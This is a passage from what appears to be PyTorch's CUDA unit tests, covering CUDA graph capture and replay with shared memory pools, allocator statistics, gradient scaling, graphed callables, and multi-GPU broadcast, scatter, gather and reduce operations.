    """Replaying two graphs concurrently on different streams: sharing a
    mempool is expected to corrupt results (asserted via assertNotEqual),
    while separate pools must stay correct.
    """
    torch.cuda.empty_cache()
    size = 1000000  # largeish to help expose race conditions
    def func_with_temps(t, val):
        # Allocates temporaries so concurrent replays contend for pool memory.
        x = t.clone() + val
        y = t.clone() + val
        return x + y
    s = torch.cuda.Stream()
    for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
        g0 = torch.cuda.CUDAGraph()
        g1 = torch.cuda.CUDAGraph()
        s0 = torch.cuda.Stream()
        s1 = torch.cuda.Stream()
        a = torch.ones((size,), device="cuda")
        s.wait_stream(torch.cuda.current_stream())
        with torch.cuda.stream(s):
            g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
            g0.capture_begin(*g0_args)
            b = a.clone()
            for _ in range(5):
                b = func_with_temps(b, 1)
            g0.capture_end()
            g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
            g1.capture_begin(*g1_args)
            c = a.clone()
            for _ in range(5):
                c = func_with_temps(c, 2)
            g1.capture_end()
        # To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
        # But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
        # The following pattern helps align device-side execution of g0 and g1's kernels.
        torch.cuda.synchronize()
        with torch.cuda.stream(s0):
            torch.cuda._sleep(1000000)
            s1.wait_stream(s0)
            g0.replay()
        with torch.cuda.stream(s1):
            g1.replay()
        torch.cuda.current_stream().wait_stream(s0)
        torch.cuda.current_stream().wait_stream(s1)
        if share_mem != "Don't share":
            # Confirms concurrent replays using the same mempool corrupted each other.
            self.assertNotEqual(b.sum().item(), size * 94)
            self.assertNotEqual(c.sum().item(), size * 156)
        else:
            # Confirms concurrent replays using different mempools did not corrupt each other.
            self.assertEqual(b.sum().item(), size * 94)
            self.assertEqual(c.sum().item(), size * 156)
    del a, b, c, g0, g1
    # Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
    torch.cuda.synchronize()
    torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
                 TEST_WITH_ROCM or
                 int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
    """Three graphs capturing a dependency chain: replay in capture order is
    always valid; replaying out of order (g0, g2, g1) is only valid when the
    graphs do not share a mempool, because g2 may reuse freed memory that
    g1's capture still reads.
    """
    torch.cuda.empty_cache()
    size = 1000
    s = torch.cuda.Stream()
    for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
        a = torch.ones((size,), device="cuda")
        g0 = torch.cuda.CUDAGraph()
        g1 = torch.cuda.CUDAGraph()
        g2 = torch.cuda.CUDAGraph()
        s.wait_stream(torch.cuda.current_stream())
        with torch.cuda.stream(s):
            g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
            g0.capture_begin(*g0_args)
            b = a.clone()
            c = b + 1
            d = b + 2
            g0.capture_end()
            args = (g0.pool(),) if share_mem == "via pool()" else g0_args
            g1.capture_begin(*args)
            e = c + 3
            # Freeing c during capture is what lets g2's capture reuse its memory.
            del c
            g1.capture_end()
            g2.capture_begin(*args)
            f = d + 4
            g2.capture_end()
        torch.cuda.current_stream().wait_stream(s)
        # Tests that replaying in capture order is valid
        g0.replay()
        g1.replay()
        g2.replay()
        self.assertEqual(e.sum().item(), size * 5)
        self.assertEqual(f.sum().item(), size * 7)
        # Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
        g0.replay()
        g2.replay()
        g1.replay()
        # If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
        # so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
        self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
        self.assertEqual(f.sum().item(), size * 7)
    del a, b, d, e, f, g0, g1, g2
    # Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
    torch.cuda.synchronize()
    torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
                 TEST_WITH_ROCM or
                 int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
    """Checks allocator stat deltas across graph capture, replay, and graph
    destruction, and verifies a graph-produced tensor remains usable after
    its graph (and private mempool) is deleted.
    """
    # Allocator rounding constants (mirroring c10/cuda/CUDACachingAllocator.cpp).
    kSmallSize = 1048576
    kSmallBuffer = 2097152
    kLargeBuffer = 20971520
    kMinLargeAlloc = 10485760
    kRoundLarge = 2097152
    elem = 4
    # this was annoying to write but stresses the expectations pretty rigorously
    cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
             (kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
             ((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
             ((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
             ((kMinLargeAlloc + 512) // elem, 3,
              3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
              kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
              "large_pool"),)
    stats_to_check = ("segment.",
                      "reserved_bytes.",
                      "active.",
                      "active_bytes.")
    gc.collect()
    torch.cuda.empty_cache()
    s = torch.cuda.Stream()
    for (numel,
         delta_cudaMallocs,
         delta_cudaMalloc_bytes,
         delta_cudaMalloc_bytes_post_del_g,
         pool_string) in cases:
        if pool_string == "small_pool":
            delta_active_blocks = 2  # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
            delta_active_bytes = numel * elem + 512  # + 512 for CUDAGraph's rng offset holder
        else:
            delta_active_blocks = 1  # We only check the large pool, which isn't affected by rng offset holder
            delta_active_bytes = numel * elem
        g = torch.cuda.CUDAGraph()
        s.wait_stream(torch.cuda.current_stream())
        with torch.cuda.stream(s):
            # Allocation stat estimates assume input is created on the same stream as capture_begin()
            # (in other words, the same stream silo as the rng offset holder, which is not allocated from the
            # capture's private pool).
            a = torch.ones((numel,), device="cuda")
            precapture_stats = torch.cuda.memory_stats()
            g.capture_begin()
            b = a.clone()
            for _ in range(5):
                b = b.clone() + 1
            g.capture_end()
        torch.cuda.current_stream().wait_stream(s)
        gc.collect()
        postcapture_stats = torch.cuda.memory_stats()
        expecteds = (delta_cudaMallocs,
                     delta_cudaMalloc_bytes,
                     delta_active_blocks,
                     delta_active_bytes)
        # Double checks replay and stats before and after a call to empty_cache
        for i in range(2):
            for stat, expected in zip(stats_to_check, expecteds):
                stat = stat + pool_string + ".current"
                current = postcapture_stats[stat] - precapture_stats[stat]
                self.assertEqual(current, expected, "Pre to post capture delta of " +
                                 stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
            g.replay()
            self.assertEqual(b.sum().item(), 6 * numel)
            if i == 0:
                torch.cuda.empty_cache()
        del g
        gc.collect()
        torch.cuda.empty_cache()
        postdel_stats = torch.cuda.memory_stats()
        # Uses graph result b after graph has been deleted
        self.assertEqual(b.sum().item(), 6 * numel)
        # b should be the only live reference remaining from the graph's private pool
        expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
        for stat, expected in zip(stats_to_check, expecteds):
            stat = stat + pool_string + ".current"
            current = postdel_stats[stat] - precapture_stats[stat]
            self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
                             stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
        # del a, b before the next case is essential, otherwise overwriting a and b in the next case
        # can throw off its allocation/deallocation counts.
        del a, b
    # Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
    torch.cuda.synchronize()
    torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
                 TEST_WITH_ROCM or
                 int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
    # Makes sure graph capture defers attempting to reclaim allocations used across streams. See
    # "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
    torch.cuda.empty_cache()
    potential_problem = torch.zeros((3,), device="cuda")
    a = torch.zeros((3,), device="cuda")
    s0 = torch.cuda.Stream()
    s1 = torch.cuda.Stream()
    s2 = torch.cuda.Stream()
    g = torch.cuda.CUDAGraph()
    torch.cuda.synchronize()
    with torch.cuda.stream(s0):
        # record_stream + del leaves an outstanding end-of-life event on s0
        # while the long _sleep kernel is still running.
        potential_problem.record_stream(s0)
        torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
        potential_problem.fill_(1.)
    del potential_problem
    with torch.cuda.stream(s1):
        g.capture_begin()
        # potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
        # mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
        # event, which will cause the capture to error.
        b = a.clone()
        # Let's also see what happens if we record_stream on a tensor during capture.
        s2.wait_stream(s1)
        with torch.cuda.stream(s2):
            b.fill_(1.)
            b.record_stream(s2)  # dummy record_stream
        del b
        s1.wait_stream(s2)
        g.capture_end()
    torch.cuda.synchronize()
    # dummy allocation triggers process_events, Hopefully successfully processes b's end-of-life event.
    c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
                 TEST_WITH_ROCM or
                 int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
    # Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
    # In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
    # avoid syncing noncapturing streams with captured events or vice versa.
    torch.cuda.empty_cache()
    model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
    x = torch.ones(100, 192, 512, device="cuda")
    # Eager run before capture initializes DropoutState.
    y = model(x)
    g = torch.cuda.CUDAGraph()
    s = torch.cuda.Stream()
    s.wait_stream(torch.cuda.current_stream())
    with torch.cuda.stream(s):
        g.capture_begin()
        y = model(x)
        g.capture_end()
    torch.cuda.current_stream().wait_stream(s)
    # Eager run after capture: the test passes if no sync error is raised.
    y = model(x)
@unittest.skipIf((not TEST_CUDA) or
                 TEST_WITH_ROCM or
                 int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
    """GradScaler used with a captured backward: scale, growth tracker, and
    scaled grads must evolve as expected across replays that alternate
    between finite and inf-producing inputs.
    """
    torch.cuda.empty_cache()
    scaler = torch.cuda.amp.GradScaler(init_scale=4.)
    g = torch.cuda.CUDAGraph()
    s = torch.cuda.Stream()
    weight = torch.ones((100,), device="cuda", requires_grad=True)
    opt = torch.optim.SGD([weight], lr=0.1)
    static_input = torch.ones_like(weight)
    static_grad = torch.ones_like(weight)
    # warmup
    s = torch.cuda.Stream()
    s.wait_stream(torch.cuda.current_stream())
    with torch.cuda.stream(s):
        loss = (weight.half() * static_input).sum()
        scaler.scale(loss).backward()
    torch.cuda.current_stream().wait_stream(s)
    opt.zero_grad(set_to_none=True)
    # capture
    with torch.cuda.graph(g):
        loss = (weight.half() * static_input).sum()
        scaler.scale(loss).backward()
    # 20000 and 40000 overflow fp16 when scaled, producing inf grads that
    # make the scaler back off.
    input_vals = [5, 20000, 5, 40000]
    # If the scale gets updated properly, these are the scale, growth tracker,
    # and grad values we expect.
    expected_scales = [4, 2, 2, 1]
    expected_growth_trackers = [1, 0, 1, 0]
    expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
    for data, scale, growth_tracker, grad_val in zip(input_vals,
                                                     expected_scales,
                                                     expected_growth_trackers,
                                                     expected_grad_vals):
        static_input.fill_(data)
        g.replay()
        self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
        scaler.step(opt)
        scaler.update()
        self.assertEqual(scaler._scale, scale)
        self.assertEqual(scaler._growth_tracker, growth_tracker)
@unittest.skipIf((not TEST_CUDA) or
                 TEST_WITH_ROCM or
                 int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
    """make_graphed_callables on two Modules and two python functions must
    train bitwise-identically to an ungraphed control model (same seeds),
    and eval mode must still run ungraphed.
    """
    torch.manual_seed(5)
    torch.cuda.manual_seed(5)
    N, D_in, H, D_out = 640, 4096, 2048, 1024
    models = []
    for _ in range(2):
        model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
                                             torch.nn.Dropout(p=0.1)).cuda()
        model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
                                             torch.nn.Dropout(p=0.2)).cuda()
        models.append(torch.nn.Sequential(model_section1, model_section2))
    model_graphed = models[0]
    model_control = models[1]
    # Identical initial weights so the runs are comparable.
    model_graphed.load_state_dict(model_control.state_dict())
    opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
    opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
    x = torch.randn(N, D_in, device='cuda')
    h = torch.randn(N, H, device='cuda', requires_grad=True)
    y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
    y = torch.randn(N, D_out, device='cuda')
    loss_fn_control = torch.nn.functional.mse_loss
    relu_control = torch.nn.functional.relu
    # This is a good stress test. It graphs four callables: two Modules and two python functions.
    model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
        torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
                                          ((x,), (h,), (y_pred,), (y_pred, y)))
    real_inputs = [torch.rand_like(x) for _ in range(10)]
    real_targets = [torch.rand_like(y) for _ in range(10)]
    for m, opt, relu, loss_fn in zip((model_graphed, model_control),
                                     (opt_graphed, opt_control),
                                     (relu_graphed, relu_control),
                                     (loss_fn_graphed, loss_fn_control)):
        # Resets RNC states before iterations for graphed and ungraphed models,
        # so dropout math should be bitwise identical for both.
        torch.manual_seed(5)
        torch.cuda.manual_seed(5)
        for data, target in zip(real_inputs, real_targets):
            opt.zero_grad(set_to_none=True)
            y_pred = m(data)
            y_pred = relu(y_pred)
            loss = loss_fn(y_pred, target)
            loss.backward()
            opt.step()
    for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
        self.assertEqual(p, pc)
    # We graphed the models in training mode. Eval should still run ungraphed.
    model_graphed.eval()
    model_control.eval()
    self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
def test_batch_norm_gather_stats(self):
    """batch_norm_gather_stats with all-ones per-device mean/invstd must
    reduce to all-ones gathered statistics."""
    sample = torch.randn(1, 3, 3, 3, device='cuda')
    mean, invstd = torch.batch_norm_gather_stats(
        sample,
        mean=torch.ones(2, 3, device='cuda'),
        invstd=torch.ones(2, 3, device='cuda'),
        running_mean=None,
        running_var=None,
        momentum=.1,
        eps=1e-5,
        count=2,
    )
    self.assertEqual(mean, torch.ones(3, device='cuda'))
    self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
    """memory_allocated is tracked per device: allocating on cuda:0 must
    increase only device 0's counter and leave all other devices unchanged."""
    from torch.cuda import memory_allocated
    n_devices = torch.cuda.device_count()
    baseline = [memory_allocated(d) for d in range(n_devices)]
    tensor = torch.ones(10, device="cuda:0")
    self.assertTrue(memory_allocated(0) > baseline[0])
    others_unchanged = all(memory_allocated(torch.cuda.device(d)) == baseline[d]
                           for d in range(1, n_devices))
    self.assertTrue(others_unchanged)
def test_matmul_memory_use(self):
    """matmul on an expanded (broadcast) batch must not allocate more peak
    memory than the unexpanded matmul, and neither must bmm."""
    def peak_and_reset():
        # Synchronize so all pending kernels are reflected in the stats,
        # then return and clear the peak-allocation counter.
        torch.cuda.synchronize()
        peak = torch.cuda.max_memory_allocated()
        torch.cuda.reset_peak_memory_stats()
        return peak
    a = torch.rand(1, 32, 32, device="cuda")
    b = torch.rand(24, 32, 1, device="cuda")
    peak_and_reset()  # discard any peak left over from the allocations above
    torch.matmul(a, b)
    matmul_mem = peak_and_reset()
    a = a.expand(24, 32, 32)
    torch.matmul(a, b)
    matmul_expand_mem = peak_and_reset()
    torch.bmm(a, b)
    bmm_mem = peak_and_reset()
    self.assertEqual(matmul_expand_mem, matmul_mem)
    self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
    """Tests for torch.cuda.comm collective helpers (broadcast / scatter /
    gather / reduce_add and their _coalesced variants) across two GPUs.

    Most tests skip unless TEST_MULTIGPU; device indices 0 and 1 are assumed.
    """
    def _test_broadcast(self, input):
        """Broadcast `input` to devices 0 and 1 and check values, devices,
        the out= path, same-device aliasing, and error messages."""
        if not TEST_MULTIGPU:
            raise unittest.SkipTest("only one GPU detected")
        # test regular
        results = comm.broadcast(input, (0, 1))
        for i, t in enumerate(results):
            self.assertEqual(t.get_device(), i)
            self.assertEqual(t, input)
            if input.is_cuda and input.get_device() == i:  # test not copying on same device
                self.assertEqual(t.data_ptr(), input.data_ptr())
        # test out=
        for inplace in [True, False]:
            if inplace:
                outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
            else:
                # device-0 output pre-filled with the input itself
                outputs = [input.cuda(0), torch.empty_like(input, device=1)]
            results = comm.broadcast(input, out=outputs)
            for r, o in zip(results, outputs):
                self.assertIs(r, o)
            for i, t in enumerate(results):
                self.assertEqual(t.get_device(), i)
                self.assertEqual(t, input)
        # test error msg
        with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
            comm.broadcast(input, (0, 1), out=outputs)
        with self.assertRaisesRegex(RuntimeError,
                                    r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
            comm.broadcast(input, out=[input.cuda(0), input.cpu()])
        with self.assertRaisesRegex(RuntimeError,
                                    r"Expected all output tensors to have same shape as the source .+ at index 1"):
            comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
    def test_broadcast_cpu(self):
        self._test_broadcast(torch.randn(5, 5))
    def test_broadcast_gpu(self):
        self._test_broadcast(torch.randn(5, 5).cuda())
    def _test_broadcast_coalesced(self, tensors, buffer_size):
        """broadcast_coalesced must match per-tensor broadcast results, return
        device-0 tensors as-is, and give copies fresh version counters."""
        b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
        for (_, bt), t in zip(b_tensors, tensors):
            self.assertEqual(bt.get_device(), 1)
            self.assertEqual(bt, t)
            self.assertIsInstance(bt, type(t))
        bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
        bc_tensors_t = list(zip(*bc_tensors))
        self.assertEqual(b_tensors, bc_tensors_t)
        for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
            self.assertEqual(bt.get_device(), bct.get_device())
            self.assertIsInstance(bct, type(bt))
        # check that tensors on device[0] are returned as-is
        for out_tensors in (b_tensors, bc_tensors_t):
            for inp_t, (out_t, _) in zip(tensors, out_tensors):
                self.assertIs(inp_t, out_t)
        # check that the tensors not on device[0] have different version counters
        # NOTE [ Version Counter in comm.*_coalesced ]
        versions = [t._version for _, t in bc_tensors_t]
        for old_version, (_, t) in zip(versions, bc_tensors_t):
            self.assertEqual(t._version, old_version)
            t.zero_()
            self.assertEqual(t._version, old_version + 1)
    @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
    # Note: fails sometimes on the CI, passes on dual gfx906
    def test_broadcast_coalesced(self):
        numel = 5
        num_bytes = numel * 8
        # mixed dense/sparse, mixed dtype list to stress the coalescing logic
        tensors = [
            make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
            torch.randn(numel).long().cuda(),
            torch.randn(numel).cuda(),
            make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
            make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
            make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
            make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
            torch.randn(numel).long().cuda(),
            torch.randn(numel).long().cuda(),
            make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
            torch.randn(numel * 2).int().cuda(),  # int is 2x shorter
            torch.randn(numel).cuda(),
        ]
        self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
    @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
    def test_broadcast_coalesced_dense_only(self):
        numel = 5
        num_bytes = numel * 8
        tensors = [
            torch.randn(numel).long().cuda(),
            torch.randn(numel).cuda(),
            torch.randn(numel).long().cuda(),
            torch.randn(numel).long().cuda(),
            torch.randn(numel * 2).int().cuda(),  # int is 2x shorter
            torch.randn(numel).cuda(),
        ]
        self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
    @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
    def test_broadcast_coalesced_empty_tensors(self):
        tensors = [
            torch.tensor([]).byte().cuda(),
            torch.randn(5).cuda(),
            torch.randn(5).double().cuda()
        ]
        self._test_broadcast_coalesced(tensors, 256)
    @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
    def test_reduce_add(self):
        x = torch.randn(5, 5)
        y = torch.randn(5, 5)
        x_cuda = x.cuda(0)
        y_cuda = y.cuda(1)
        result = comm.reduce_add((x_cuda, y_cuda))
        # result lands on the first input's device
        self.assertEqual(result.get_device(), 0)
        self.assertEqual(result.cpu(), x + y)
    def _test_reduce_add_coalesced(self, tensors, buffer_size):
        """reduce_add_coalesced over duplicated inputs must equal per-tensor
        reduce_add (i.e. 2x each tensor) and return freshly-allocated outputs."""
        dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
        r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
        for r, t in zip(r_tensors, tensors):
            self.assertEqualTypeString(r, t)
            self.assertEqual(r, t * 2)
        rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
        self.assertEqual(r_tensors, rc_tensors)
        for r, rc in zip(r_tensors, rc_tensors):
            self.assertEqualTypeString(rc, r)
        # Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
        # We can check that they have different version counters.
        # NOTE [ Version Counter in comm.*_coalesced ]
        versions = [t._version for t in rc_tensors]
        for old_version, t in zip(versions, rc_tensors):
            self.assertEqual(t._version, old_version)
            t.zero_()
            self.assertEqual(t._version, old_version + 1)
    @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
    def test_reduce_add_coalesced(self):
        numel = 5
        num_bytes = numel * 8
        tensors = [
            make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
            torch.randn(numel).long().cuda(),
            torch.randn(numel).cuda(),
            make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
            make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
            make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
            make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
            torch.randn(numel).long().cuda(),
            torch.randn(numel).long().cuda(),
            make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
            torch.randn(numel * 2).int().cuda(),  # int is 2x shorter
            torch.randn(numel).cuda(),
        ]
        self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
    @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
    def test_reduce_add_coalesced_dense_only(self):
        numel = 5
        num_bytes = numel * 8
        tensors = [
            torch.randn(numel).long().cuda(),
            torch.randn(numel).cuda(),
            torch.randn(numel).long().cuda(),
            torch.randn(numel).long().cuda(),
            torch.randn(numel * 2).int().cuda(),  # int is 2x shorter
            torch.randn(numel).cuda(),
        ]
        self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
    def _test_scatter(self, input, chunk_sizes=None, dim=0):
        """Scatter `input` over devices 0 and 1 along `dim`, checking chunk
        contents, the out= path, same-device view aliasing, and error messages."""
        if not TEST_MULTIGPU:
            raise unittest.SkipTest("only one GPU detected")
        if chunk_sizes is None:
            # even split into two chunks when no explicit sizes are given
            ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
        else:
            ref_chunk_sizes = chunk_sizes
        # test regular
        result = comm.scatter(input, (0, 1), chunk_sizes, dim)
        self.assertEqual(len(result), 2)
        chunk_start = 0
        for i, r in enumerate(result):
            chunk_end = chunk_start + ref_chunk_sizes[i]
            index = [slice(None, None) for _ in range(input.dim())]
            index[dim] = slice(chunk_start, chunk_end)
            self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
            chunk_start = chunk_end
            if r.device == input.device:
                self.assertEqual(r.data_ptr(), input.data_ptr())  # for target @ same device, a view should be returned
        # test out
        out = [torch.empty_like(t) for t in result]
        result = comm.scatter(input, dim=dim, out=out)
        self.assertEqual(len(result), 2)
        chunk_start = 0
        for i, r in enumerate(result):
            self.assertIs(r, out[i])
            chunk_end = chunk_start + ref_chunk_sizes[i]
            index = [slice(None, None) for _ in range(input.dim())]
            index[dim] = slice(chunk_start, chunk_end)
            self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
            chunk_start = chunk_end
        # test error msg
        if chunk_sizes is not None:
            with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
                comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
        with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
            comm.scatter(input, (0, 1), dim=dim, out=out)
        with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
            comm.scatter(input, (), dim=dim)
        with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
            comm.scatter(input, dim=dim, out=[])
        with self.assertRaisesRegex(RuntimeError,
                                    r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
            comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
        with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
            comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
        with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
            index = [slice(None, None) for _ in range(input.dim())]
            index[dim] = slice(1, None)
            comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
    def test_scatter_cpu(self):
        self._test_scatter(torch.randn(4, 4), dim=0)
    def test_scatter_cpu_dim(self):
        self._test_scatter(torch.randn(4, 4), dim=1)
    def test_scatter_cpu_neg_dim(self):
        self._test_scatter(torch.randn(4, 4), dim=-2)
    def test_scatter_cpu_sizes(self):
        self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
    def test_scatter_gpu(self):
        self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
    def test_scatter_gpu_dim(self):
        self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
    def test_scatter_gpu_neg_dim(self):
        self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
    def test_scatter_gpu_sizes(self):
        self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
    def _test_gather(self, dim):
        """Gather two 2x5 tensors from cuda:0 and cuda:1 along `dim` into each
        supported destination (default, explicit device, cpu, out=)."""
        if not TEST_MULTIGPU:
            raise unittest.SkipTest("only one GPU detected")
        x = torch.randn(2, 5, device=0)
        y = torch.randn(2, 5, device=1)
        expected_size = list(x.size())
        expected_size[dim] += y.size(dim)
        expected_size = torch.Size(expected_size)
        destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
        if torch.cuda.device_count() > 2:
            destinations.append(torch.device('cuda:2'))
        with torch.cuda.device(1):
            for destination in destinations:
                if destination is None:
                    # destination=None gathers onto the current device (cuda:1 here)
                    expected_device = torch.device('cuda', torch.cuda.current_device())
                else:
                    expected_device = destination
                for use_out in [True, False]:
                    if use_out:
                        out = torch.empty(expected_size, device=expected_device)
                        result = comm.gather((x, y), dim, out=out)
                        self.assertIs(out, result)
                    else:
                        result = comm.gather((x, y), dim, destination=destination)
                        self.assertEqual(result.device, expected_device)
                    self.assertEqual(result.size(), expected_size)
                    index = [slice(None, None), slice(None, None)]
                    index[dim] = slice(0, x.size(dim))
                    self.assertEqual(result[tuple(index)], x)
                    index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
                    self.assertEqual(result[tuple(index)], y)
        # test error msg
        with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
            comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
        with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
            comm.gather(())
        with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
            comm.gather((x.cpu(), y))
        with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
            comm.gather((x, y.unsqueeze(0)))
        with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
            if dim in [0, -2]:
                comm.gather((x, y[:, 1:]), dim=dim)
            elif dim in [1, -1]:
                comm.gather((x, y[1:, :]), dim=dim)
    def test_gather(self):
        self._test_gather(0)
    def test_gather_dim(self):
        self._test_gather(1)
    def test_gather_neg_dim(self):
        self._test_gather(-1)
    @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
    def test_memory_format_scatter_gather(self):
        # channels_last layout must survive a scatter/gather round trip
